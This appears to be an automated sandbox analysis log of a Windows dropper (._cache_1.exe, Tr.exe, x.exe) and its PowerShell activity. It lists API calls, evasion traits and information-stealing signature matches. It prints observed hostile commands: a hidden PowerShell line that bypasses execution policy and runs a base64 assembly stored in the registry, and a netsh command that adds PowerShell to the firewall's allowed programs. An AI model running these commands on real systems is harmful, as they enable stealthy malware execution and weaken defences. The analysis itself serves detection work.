Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 922
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3099
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1249
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2193
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1163
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: foregroundWindowGot 1776
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 920
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1002
Source: C:\Users\user\Desktop\._cache_1.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\._cache_1.exe API coverage: 3.9 %
Source: C:\Users\user\AppData\Local\Temp\Tr.exe API coverage: 4.1 %
Source: C:\Users\user\AppData\Local\Temp\Tr.exe API coverage: 4.0 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3384 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3388 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3380 Thread sleep time: -1249000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3380 Thread sleep time: -1163000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3388 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\netsh.exe TID: 3420 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3580 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2449B GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00B2449B
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_00B2C7E8
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2C75D FindFirstFileW,FindClose, 1_2_00B2C75D
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00B2F021
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00B2F17E
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00B2F47F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B23833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00B23833
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B23B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00B23B56
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00B2BD48
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040449B GetFileAttributesW,FindFirstFileW,FindClose, 12_2_0040449B
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040C75D FindFirstFileW,FindClose, 12_2_0040C75D
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 12_2_0040C7E8
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_0040F021
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_0040F17E
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 12_2_0040F47F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00403833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00403833
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00403B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00403B56
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 12_2_0040BD48
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
Source: C:\Users\user\Desktop\._cache_1.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\._cache_1.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045A370 BlockInput, 0_2_0045A370
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AF5BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00AF5BFC
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_004238DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0041F250 SetUnhandledExceptionFilter, 0_2_0041F250
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041A208
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00417DAA
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AEA2A4 SetUnhandledExceptionFilter, 1_2_00AEA2A4
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AEA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00AEA2D5
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003CA2A4 SetUnhandledExceptionFilter, 12_2_003CA2A4
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003CA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_003CA2D5

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00436CD7 LogonUserW, 0_2_00436CD7
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event, 0_2_0043333C
Source: C:\Users\user\Desktop\._cache_1.exe Process created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe"
Source: unknown Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min powershell -executionpolicy bypass -windowstyle hidden -noexit -command [system.reflection.assembly]::load([system.convert]::frombase64string((get-itemproperty hkcu:\software).valuex)).entrypoint.invoke($null,$null)
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00446124
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B24A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 1_2_00B24A08
Source: Tr.exe, 00000001.00000000.342399628.0000000000B74000.00000002.00000001.01000000.00000005.sdmp, Tr.exe, 0000000C.00000002.411310595.0000000000454000.00000002.00000001.01000000.00000005.sdmp, Tr.exe.0.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: powershell.exe, 00000004.00000002.880711036.000000001B7AC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.872864488.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: Tr.exe Binary or memory string: Shell_TrayWnd
Source: powershell.exe, 00000004.00000002.880078674.000000001A824000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerb
Source: powershell.exe, 00000004.00000002.880711036.000000001B7AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Program Manager
Source: powershell.exe, 00000004.00000002.872864488.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager8
Source: powershell.exe, 00000004.00000002.880711036.000000001B775000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <Program Manager
Source: ._cache_1.exe, x.exe.0.dr Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE87AB cpuid 1_2_00AE87AB
Source: C:\Users\user\Desktop\._cache_1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\._cache_1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW, 0_2_004720DB
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00472C3F GetUserNameW, 0_2_00472C3F
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 0_2_0041E364
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE

Stealing of Sensitive Information

Source: Yara match File source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR
Source: Tr.exe Binary or memory string: WIN_81
Source: Tr.exe Binary or memory string: WIN_XP
